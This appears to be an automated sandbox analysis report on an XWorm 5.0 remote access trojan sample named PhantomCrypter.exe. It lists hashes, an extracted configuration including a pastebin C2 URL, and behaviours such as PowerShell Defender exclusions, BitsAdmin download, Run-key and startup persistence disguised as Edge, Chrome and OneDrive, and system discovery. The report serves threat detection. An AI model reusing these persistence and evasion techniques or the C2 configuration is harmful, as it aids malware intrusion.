xworm | 85df9fc4b8d48b029a6d135a743092a2421bef43785390a6a847eadd42da2047

Analysis

max time kernel
300s
max time network
300s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
20/01/2025, 15:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PhantomCrypter/PhantomCrypter.exe
Size

5.2MB
MD5

e877adfe74b6bd2ad9b9f5c73f839152
SHA1

ff73461cd1fc5d9755d8dfa135ed3f6401989d00
SHA256

71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96
SHA512

7c0828a3e966dee6e93e8c6797068c1d4b27a9c1b88249381db6028d7ec18b282560a9e215da2f2c9841307c0f1732fea47983107fd606b850386e993f7431d1
SSDEEP

98304:KUJgH4K+NsPeD9k/OYU2HkSBEIHFP2gH4KdBwgH/fkEihw:KUcT+NsPOkeLAVFXTdBwgH/Mr

Score

10^/10

xworm discovery dropper execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

fSptE7osVO19YSsZ

Attributes

Install_directory
%AppData%
install_file
msedge.exe
pastebin_url
https://pastebin.com/raw/eZa6J63T

aes.plain

Signatures

Detect Xworm Payload 8 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002aaf1-6.dat	family_xworm
behavioral1/memory/2588-13-0x00000000000F0000-0x000000000011E000-memory.dmp	family_xworm
behavioral1/files/0x001b00000002ab98-34.dat	family_xworm
behavioral1/memory/3572-43-0x0000000000410000-0x000000000043C000-memory.dmp	family_xworm
behavioral1/files/0x001900000002abb3-49.dat	family_xworm
behavioral1/files/0x001c00000002abb4-60.dat	family_xworm
behavioral1/memory/1444-65-0x0000000000C70000-0x0000000000C9E000-memory.dmp	family_xworm
behavioral1/memory/3340-68-0x00000000002B0000-0x00000000002D8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5372	powershell.exe
5424	powershell.exe
5772	powershell.exe
5816	powershell.exe
1788	powershell.exe
5576	powershell.exe
5732	powershell.exe
1424	powershell.exe
248	powershell.exe
4856	powershell.exe
6124	powershell.exe
6132	powershell.exe
5700	powershell.exe
2976	powershell.exe
5364	powershell.exe
5308	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
1840	bitsadmin.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe

Executes dropped EXE 21 IoCs

pid	Process
2588	msedge.exe
3448	PhantomCrypters.exe
3572	Chrome Update.exe
1444	msedge.exe
3340	OneDrive.exe
4900	TOPHERC.exe
5412	Chrome Update.exe
3048	msedge.exe
6104	OneDrive.exe
5420	Chrome Update.exe
4432	msedge.exe
5968	OneDrive.exe
2364	Chrome Update.exe
1528	msedge.exe
2192	OneDrive.exe
4408	Chrome Update.exe
5268	msedge.exe
5436	OneDrive.exe
1944	Chrome Update.exe
5688	msedge.exe
6040	OneDrive.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe"	Chrome Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe"	OneDrive.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
203	pastebin.com
261	pastebin.com
266	pastebin.com
270	pastebin.com
85	pastebin.com
172	pastebin.com
179	pastebin.com
137	pastebin.com
157	pastebin.com
154	pastebin.com
341	pastebin.com
111	pastebin.com
125	pastebin.com
237	pastebin.com
276	pastebin.com
280	pastebin.com
312	pastebin.com
46	pastebin.com
206	pastebin.com
164	pastebin.com
182	pastebin.com
226	pastebin.com
311	pastebin.com
34	pastebin.com
116	pastebin.com
86	pastebin.com
108	pastebin.com
148	pastebin.com
167	pastebin.com
245	pastebin.com
255	pastebin.com
38	pastebin.com
51	pastebin.com
303	pastebin.com
347	pastebin.com
171	pastebin.com
236	pastebin.com
366	pastebin.com
41	pastebin.com
89	pastebin.com
166	pastebin.com
22	pastebin.com
124	pastebin.com
152	pastebin.com
230	pastebin.com
58	pastebin.com
118	pastebin.com
342	pastebin.com
59	pastebin.com
81	pastebin.com
292	pastebin.com
314	pastebin.com
340	pastebin.com
388	pastebin.com
23	pastebin.com
194	pastebin.com
225	pastebin.com
372	pastebin.com
96	pastebin.com
170	pastebin.com
149	pastebin.com
221	pastebin.com
287	pastebin.com
335	pastebin.com

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	TOPHERC.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TOPHERC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133818593224143724"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	TOPHERC.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	PhantomCrypters.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	TOPHERC.exe
Key created	\Registry\User\S-1-5-21-556537508-2730415644-482548075-1000_Classes\NotificationData	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	TOPHERC.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	TOPHERC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000a97e8dd7af18db01bcd298cdb718db01b4359bcdb718db0114000000	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	TOPHERC.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	TOPHERC.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	TOPHERC.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4892	schtasks.exe
4828	schtasks.exe
5292	schtasks.exe
5656	schtasks.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
340	chrome.exe
340	chrome.exe
4160	msedge.exe
4160	msedge.exe
4064	msedge.exe
4064	msedge.exe
1424	powershell.exe
1424	powershell.exe
4856	powershell.exe
4856	powershell.exe
1424	powershell.exe
248	powershell.exe
248	powershell.exe
2976	powershell.exe
2976	powershell.exe
4856	powershell.exe
248	powershell.exe
2976	powershell.exe
5364	powershell.exe
5364	powershell.exe
5372	powershell.exe
5372	powershell.exe
5424	powershell.exe
5424	powershell.exe
5424	powershell.exe
5364	powershell.exe
5372	powershell.exe
5816	powershell.exe
5816	powershell.exe
5816	powershell.exe
6016	msedge.exe
6016	msedge.exe
6124	powershell.exe
6124	powershell.exe
6132	powershell.exe
6132	powershell.exe
6124	powershell.exe
6132	powershell.exe
1788	powershell.exe
1788	powershell.exe
1788	powershell.exe
5308	powershell.exe
5308	powershell.exe
5308	powershell.exe
5732	powershell.exe
5732	powershell.exe
5700	powershell.exe
5700	powershell.exe
5732	powershell.exe
5700	powershell.exe
5576	powershell.exe
5576	powershell.exe
5772	powershell.exe
5772	powershell.exe
5576	powershell.exe
5772	powershell.exe
6032	identity_helper.exe
6032	identity_helper.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4900	TOPHERC.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
340	chrome.exe
340	chrome.exe
340	chrome.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
340	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2588	msedge.exe
Token: SeDebugPrivilege	3572	Chrome Update.exe
Token: SeDebugPrivilege	1444	msedge.exe
Token: SeDebugPrivilege	3340	OneDrive.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	248	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeDebugPrivilege	5364	powershell.exe
Token: SeDebugPrivilege	5372	powershell.exe
Token: SeDebugPrivilege	5424	powershell.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeDebugPrivilege	5816	powershell.exe
Token: SeDebugPrivilege	6124	powershell.exe
Token: SeDebugPrivilege	6132	powershell.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	5700	powershell.exe
Token: SeDebugPrivilege	5576	powershell.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeDebugPrivilege	5772	powershell.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeShutdownPrivilege	340	chrome.exe
Token: SeCreatePagefilePrivilege	340	chrome.exe
Token: SeDebugPrivilege	5412	Chrome Update.exe
Token: SeDebugPrivilege	3048	msedge.exe
Token: SeDebugPrivilege	6104	OneDrive.exe
Token: SeShutdownPrivilege	340	chrome.exe

Suspicious use of FindShellTrayWindow 54 IoCs

pid	Process
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
340	chrome.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4900	TOPHERC.exe
4900	TOPHERC.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
340	chrome.exe
340	chrome.exe
340	chrome.exe
